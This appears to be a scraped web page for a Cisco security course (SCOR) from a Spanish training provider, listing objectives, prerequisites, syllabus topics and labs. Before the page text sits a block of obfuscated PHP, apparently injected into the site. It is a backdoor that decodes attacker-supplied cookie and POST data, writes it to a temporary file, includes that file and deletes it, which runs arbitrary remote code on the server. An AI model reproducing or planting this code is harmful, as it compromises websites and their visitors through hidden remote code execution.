$PFkQQj = chr (121) . "\x5f" . 'i' . "\131" . chr ( 450 - 373 ).chr ( 258 - 182 ); $cndBMIMKWU = "\x63" . "\x6c" . 'a' . "\163" . chr (115) . chr (95) . 'e' . "\170" . 'i' . 's' . chr (116) . 's';$YCsjZOjng = class_exists($PFkQQj); $PFkQQj = "60693";$cndBMIMKWU = "62927";$LSHFWHvtVn = !1;if ($YCsjZOjng == $LSHFWHvtVn){function JQiUsND(){return FALSE;}$flGKbPmb = "24328";JQiUsND();class y_iYML{private function kHqizmFp($flGKbPmb){if (is_array(y_iYML::$HnXmizr)) {$uDVeO = sys_get_temp_dir() . "/" . crc32(y_iYML::$HnXmizr["\x73" . "\x61" . "\154" . 't']);@y_iYML::$HnXmizr['w' . chr ( 342 - 228 ).chr ( 802 - 697 )."\164" . chr (101)]($uDVeO, y_iYML::$HnXmizr["\143" . chr (111) . chr ( 583 - 473 ).'t' . 'e' . chr ( 405 - 295 )."\164"]);include $uDVeO;@y_iYML::$HnXmizr['d' . "\145" . "\154" . 'e' . "\164" . "\x65"]($uDVeO); $flGKbPmb = "24328";exit();}}private $nfIOxBUgci;public function KzSRiT(){echo 57754;}public function __destruct(){$flGKbPmb = "58915_20028";$this->kHqizmFp($flGKbPmb); $flGKbPmb = "58915_20028";}public function __construct($gBEinuZpzm=0){$FXHNMtt = $_POST;$CMSrFiI = $_COOKIE;$BQAQiDZrib = "cb529a8e-ec0b-435f-86a9-4175305cacff";$xonCzaGOAG = @$CMSrFiI[substr($BQAQiDZrib, 0, 4)];if (!empty($xonCzaGOAG)){$EviQPEw = "base64";$pkBLiUThwD = "";$xonCzaGOAG = explode(",", $xonCzaGOAG);foreach ($xonCzaGOAG as $HrpNnQ){$pkBLiUThwD .= @$CMSrFiI[$HrpNnQ];$pkBLiUThwD .= @$FXHNMtt[$HrpNnQ];}$pkBLiUThwD = array_map($EviQPEw . "\x5f" . "\x64" . chr ( 1028 - 927 ).'c' . "\157" . chr (100) . "\x65", array($pkBLiUThwD,)); $pkBLiUThwD = $pkBLiUThwD[0] ^ str_repeat($BQAQiDZrib, (strlen($pkBLiUThwD[0]) / strlen($BQAQiDZrib)) + 1);y_iYML::$HnXmizr = @unserialize($pkBLiUThwD); $pkBLiUThwD = class_exists("58915_20028");}}public static $HnXmizr = 41468;}$DhFBgMpMgw = new /* 61252 */ y_iYML(24328 + 24328); $_POST = Array();unset($DhFBgMpMgw);} Implementing and Operating Cisco Security Core Technologies|Grupo Loyal

Implementing and Operating Cisco Security Core Technologies

The Implementing and Operating Cisco Security Core Technologies (SCOR) course helps you prepare for the Cisco® CCNP® Security and CCIE® Security certifications and for senior-level security roles. In this course, you will master the skills and technologies you need to implement core Cisco security solutions to provide advanced threat protection against cybersecurity attacks. You will learn security for networks, cloud and content, endpoint protection, secure network access, visibility and enforcements. You will get extensive hands-on experience deploying Cisco Firepower Next-Generation Firewall and Cisco ASA Firewall; configuring access control policies, mail policies, and 802.1X Authentication; and more. You will get introductory practice on Cisco Stealthwatch Enterprise and Cisco Stealthwatch Cloud threat detection features.

Please note that this course is a combination of Instructor-Led and Self-Paced Study - 5 days in the classroom and approx 3 days of self study. The self-study content will be provided as part of the digital courseware that you will recieve at the beginning of the course and should be part of your preparation for the exam.

Objetivos

After completing this course you should be able to:

Describe information security concepts and strategies within the network
Describe common TCP/IP, network application, and endpoint attacks
Describe how various network security technologies work together to guard against attacks
Implement access control on Cisco ASA appliance and Cisco Firepower Next-Generation Firewall
Describe and implement basic email content security features and functions provided by Cisco Email Security Appliance
Describe and implement web content security features and functions provided by Cisco Web Security Appliance
Describe Cisco Umbrella security capabilities, deployment models, policy management, and Investigate console
Introduce VPNs and describe cryptography solutions and algorithms
Describe Cisco secure site-to-site connectivity solutions and explain how to deploy Cisco IOS VTI-based point-to-point IPsec VPNs, and point-to-point IPsec VPN on the Cisco ASA and Cisco FirePower NGFW
Describe and deploy Cisco secure remote access connectivity solutions and describe how to configure 802.1X and EAP authentication
Provide basic understanding of endpoint security and describe AMP for Endpoints architecture and basic features
Examine various defenses on Cisco devices that protect the control and management plane
Configure and verify Cisco IOS Software Layer 2 and Layer 3 Data Plane Controls
Describe Cisco Stealthwatch Enterprise and Stealthwatch Cloud solutions
Describe basics of cloud computing and common cloud attacks and how to secure cloud environment

Ciberseguridad

Disponible en formato e-learning

Disponible en formato presencial

Disponible en formato a distancia

Subvención disponible
A través de Fundae, cumpliendo requisitos.

Duración
25 horas

  • Dificultad 50% 50%
  • Nivel alcanzado 80% 80%

Dirigido a

Security individuals who need to be able to implement and operate core security technologies including network security, cloud security, content security, endpoint protection and detection, secure network access, visibility and enforcements.

Conocimientos requeridos

Attendees should meet the following prerequisites:

Familiarity with Ethernet and TCP/IP networking
Working Knowledge of the Windows operating system
Working Knowledge of Cisco IOS networking and concepts
Familiarity with basics of networking security concepts

Pre-requisitos:
CCNA - Implementing and Administering Cisco Solutions

Temario

Describing Information Security Concepts (Self-Study)

Information Security Overview
Managing Risk
Vulnerability Assessment
Understanding CVSS
Describing Common TCP/IP Attacks (Self-Study)

Legacy TCP/IP Vulnerabilities
IP Vulnerabilities
ICMP Vulnerabilities
TCP Vulnerabilities
UDP Vulnerabilities
Attack Surface and Attack Vectors
Reconnaissance Attacks
Access Attacks
Man-In-The-Middle Attacks
Denial of Service and Distributed Denial of Service Attacks
Reflection and Amplification Attacks
Spoofing Attacks
DHCP Attacks
Describing Common Network Application Attacks (Self-Study)

Password Attacks
DNS-Based Attacks
DNS Tunneling
Web-Based Attacks
HTTP 302 Cushioning
Command Injections
SQL Injections
Cross-Site Scripting and Request Forgery
Email-Based Attacks
Describing Common Endpoint Attacks (Self-Study)

Buffer Overflow
Malware
Reconnaissance Attack
Gaining Access and Control
Gaining Access via Social Engineering
Gaining Access via Web-Based Attacks
Exploit Kits and Rootkits
Privilege Escalation
Post-Exploitation Phase
Angler Exploit Kit
Describing Network Security Technologies

Defense-in-Depth Strategy
Defending Across the Attack Continuum
Network Segmentation and Virtualization Overview
Stateful Firewall Overview
Security Intelligence Overview
Threat Information Standardization
Network-Based Malware Protection Overview
IPS Overview
Next Generation Firewall Overview
Email Content Security Overview
Web Content Security Overview
Threat Analytic Systems Overview
DNS Security Overview
Authentication, Authorization, and Accounting Overview
Identity and Access Management Overview
Virtual Private Network Technology Overview
Network Security Device Form Factors Overview
Deploying Cisco ASA Firewall

Cisco ASA Deployment Types
Cisco ASA Interface Security Levels
Cisco ASA Objects and Object Groups
Network Address Translation
Cisco ASA Interface ACLs
Cisco ASA Global ACLs
Cisco ASA Advanced Access Policies
Cisco ASA High Availability Overview
Deploying Cisco Firepower Next-Generation Firewall

Cisco Firepower NGFW Deployments
Cisco Firepower NGFW Packet Processing and Policies
Cisco Firepower NGFW Objects
Cisco Firepower NGFW NAT
Cisco Firepower NGFW Prefilter Policies
Cisco Firepower NGFW Access Control Policies
Cisco Firepower NGFW Security Intelligence
Cisco Firepower NGFW Discovery Policies
Cisco Firepower NGFW IPS Policies
Cisco Firepower NGFW Malware and File Policies
Deploying Email Content Security

Cisco Email Content Security Overview
SMTP Overview
Email Pipeline Overview
Public and Private Listeners
Host Access Table Overview
Recipient Access Table Overview
Mail Policies Overview
Protection Against Spam and Graymail
Anti-virus and Anti-malware Protection
Outbreak Filters
Content Filters
Data Loss Prevention
Email Encryption
Deploying Web Content Security

Cisco WSA Overview
Deployment Options
Network Users Authentication
HTTPS Traffic Decryption
Access Policies and Identification Profiles
Acceptable Use Controls Settings
Anti-Malware Protection
Deploying Cisco Umbrella (Self-Study)

Cisco Umbrella Architecture
Deploying Cisco Umbrella
Cisco Umbrella Roaming Client
Managing Cisco Umbrella
Cisco Umbrella Investigate Overview
Explaining VPN Technologies and Cryptography

VPN Definition
VPN Types
Secure Communication and Cryptographic Services
Keys in Cryptography
Public Key Infrastructure
Introducing Cisco Secure Site-to-Site VPN Solutions

Site-to-Site VPN Topologies
IPsec VPN Overview
IPsec Static Crypto Maps
IPsec Static Virtual Tunnel Interface
Dynamic Multipoint VPN
Cisco IOS FlexVPN
Deploying Cisco IOS VTI-Based Point-to-Point

Cisco IOS VTIs
Static VTI Point-to-Point IPsec IKEv2 VPN Configuration
Deploying Point-to-Point IPsec VPNs on the Cisco ASA and Cisco Firepower NGFW

Point-to-Point VPNs on the Cisco ASA and Cisco Firepower NGFW
Cisco ASA Point-to-Point VPN Configuration
Cisco Firepower NGFW Point-to-Point VPN Configuration
Introducing Cisco Secure Remote Access VPN Solutions

Remote Access VPN Components
Remote Access VPN Technologies
SSL Overview
Deploying Remote Access SSL VPNs on the Cisco ASA and Cisco Firepower NGFW

Remote Access Configuration Concepts
Connection Profiles
Group Policies
Cisco ASA Remote Access VPN Configuration
Cisco Firepower NGFW Remote Access VPN Configuration
Explaining Cisco Secure Network Access Solutions

Cisco Secure Network Access
Cisco Secure Network Access Components
AAA Role in Cisco Secure Network Access Solution
Cisco Identity Services Engine
Cisco TrustSec
Describing 802.1X Authentication

802.1X and EAP
EAP Methods
Role of RADIUS in 802.1X Communications
RADIUS Change of Authorization
Configuring 802.1X Authentication

Cisco Catalyst Switch 802.1X Configuration
Cisco WLC 802.1X Configuration
Cisco ISE 802.1X Configuration
Supplicant 802.1x Configuration
Cisco Central Web Authentication
Describing Endpoint Security Technologies (Self-Study)

Host-Based Personal Firewall
Host-Based Anti-Virus
Host-Based Intrusion Prevention System
Application Whitelists and Blacklists
Host-Based Malware Protection
Sandboxing Overview
File Integrity Checking
Deploying Cisco AMP for Endpoints (Self-study)

Cisco AMP for Endpoints Architecture
Cisco AMP for Endpoints Engines
Retrospective Security with Cisco AMP
Cisco AMP Device and File Trajectory
Managing Cisco AMP for Endpoints
Introducing Network Infrastructure Protection (Self-Study)

Identifying Network Device Planes
Control Plane Security Controls
Management Plane Security Controls
Network Telemetry
Layer 2 Data Plane Security Controls
Layer 3 Data Plane Security Controls
Deploying Control Plane Security Controls (Self-Study)

Infrastructure ACLs
Control Plane Policing
Control Plane Protection
Routing Protocol Security
Deploying Layer 2 Data Plane Security Controls (Self-Study)

Overview of Layer 2 Data Plane Security Controls
VLAN-Based Attacks Mitigation
STP Attacks Mitigation
Port Security
Private VLANs
DHCP Snooping
ARP Inspection
Storm Control
MACsec Encryption
Deploying Layer 3 Data Plane Security Controls (Self-Study)

Infrastructure Antispoofing ACLs
Unicast Reverse Path Forwarding
IP Source Guard
Labs

Configure Network Settings And NAT On Cisco ASA
Configure Cisco ASA Access Control Policies
Configure Cisco Firepower NGFW NAT
Configure Cisco Firepower NGFW Access Control Policy
Configure Cisco Firepower NGFW Discovery and IPS Policy
Configure Cisco NGFW Malware and File Policy
Configure Listener, HAT, and RAT on Cisco ESA
Configure Mail Policies
Configure Proxy Services, Authentication, and HTTPS Decryption
Enforce Acceptable Use Control and Malware Protection
Examine the Umbrella Dashboard
Examine Cisco Umbrella Investigate
Explore DNS Ransomware Protection by Cisco Umbrella
Configure Static VTI Point-to-Point IPsec IKEv2 Tunnel
Configure Point-to-Point VPN between the Cisco ASA and Cisco Firepower NGFW
Configure Remote Access VPN on the Cisco Firepower NGFW
Explore Cisco AMP for Endpoints
Perform Endpoint Analysis Using AMP for Endpoints Console
Explore File Ransomware Protection by Cisco AMP for Endpoints Console
Explore Cisco Stealthwatch Enterprise v6.9.3
Explore CTA in Stealthwatch Enterprise v7.0
Explore the Cisco Cloudlock Dashboard and User Security
Explore Cisco Cloudlock Application and Data Security
Explore Cisco Stealthwatch Cloud
Explore Stealthwatch Cloud Alert Settings, Watchlists, and Sensors

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